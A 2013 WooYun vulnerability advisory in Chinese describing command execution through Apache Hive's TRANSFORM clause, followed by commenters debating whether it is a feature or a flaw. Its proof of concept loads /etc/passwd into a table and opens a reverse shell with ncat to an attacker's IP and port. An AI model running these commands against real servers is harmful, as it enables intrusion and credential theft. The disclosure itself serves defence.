当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018834

漏洞标题:Hive任意命令/代码执行漏洞

相关厂商:apache

漏洞作者: kindle

提交时间:2013-02-18 09:57

修复时间:2013-02-18 09:57

公开时间:2013-02-18 09:57

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-02-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-02-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Hive是建立在 Hadoop 上的数据仓库基础构架。它提供了一系列的工具,可以用来进行数据提取转化加载(ETL),这是一种可以存储、查询和分析存储在 Hadoop 中的大规模数据的机制。Hive 定义了简单的类 SQL 查询语言,称为 QL,它允许熟悉 SQL 的用户查询数据。同时,这个语言也允许熟悉 MapReduce 开发者的开发自定义的 mapper 和 reducer 来处理内建的 mapper 和 reducer 无法完成的复杂的分析工作。

详细说明:

HQL可以通过transform自定义Hive使用的 Map/Reduce 脚本,从而调用shell/python等语言,导致攻击者可以通过hive接口等相关操作方式直接获取服务器权限

漏洞证明:

创建测试表
create table if not exists kindle(exploit string);
导入/etc/passwd文件到kindle表数据(这步很关键,没数据无法触发漏洞)
load data local inpath '/etc/passwd' INTO TABLE kindle;
通过transform来自定义hive使用的shell命令,反弹shell
select transform(exploit) USING '/usr/bin/ncat -e /bin/sh ip port' from kindle;
删除测试表
drop table kindle;

修复方案:

block transform

版权声明:转载请注明来源 kindle@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2013-02-18 09:57 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    给力

  2. 2013-02-18 11:05 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    @xsser 这个应该算特性吧。

  3. 2013-02-18 11:08 | G8dSnow ( 路人 | Rank:21 漏洞数:5 | 一直在学习技术、分享知识的路上)

    只要读下文档,就能找到这种“漏洞”,只是特性而已,在实际生产环境中需要禁用这些函数

  4. 2013-02-18 11:09 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @G8dSnow 关键是如果默认开启的话,对很多应用影响比较大

  5. 2013-02-18 11:11 | kindle ( 实习白帽子 | Rank:40 漏洞数:12 | hh)

    @xsser 默认是都开启的,而且没有禁用方式,如果要禁用需要自己修改源代码

  6. 2013-02-18 11:36 | kindle ( 实习白帽子 | Rank:40 漏洞数:12 | hh)

    @G8dSnow 确实是特性没错,但是官方并没提供禁用该函数方法,切默认是开启的,切默认存在严重安全问题。不是漏洞吗?

  7. 2013-02-18 13:39 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    @kindle 算比较严重的安全隐患吧,或者很严重的安全问题,漏洞可能还够不上

  8. 2013-02-18 15:19 | kindle ( 实习白帽子 | Rank:40 漏洞数:12 | hh)

    @xsjswt 哦,因为我见过几乎99%漏洞都是特性导致的,所以我把特性导致的安全问题一律归类到漏洞范围了。漏洞的公共定义比较简单,每个人有自己的理解吧。

  9. 2013-02-18 15:24 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @kindle 支持!

  10. 2013-03-28 20:39 | 小龙女 ( 路人 | Rank:3 漏洞数:2 | venus)

    Hive还提供了本地命令执行的功能,就是类似如下命令。hive>!useradd fuckbg -u 544;你可以执行任意本地命令,这个应该就和xp_cmdshell一样吧,同样存在安全隐患

  11. 2013-03-29 14:57 | kindle ( 实习白帽子 | Rank:40 漏洞数:12 | hh)

    @小龙女 这个和mysql的一样,mysql也有这个机制,这个不存在安全问题哈。因为你就算链接到!id执行的是你客户端系统的命令。不过hive还支持udf,可以通过udf来执行命令,大风以前的ppt里有讲过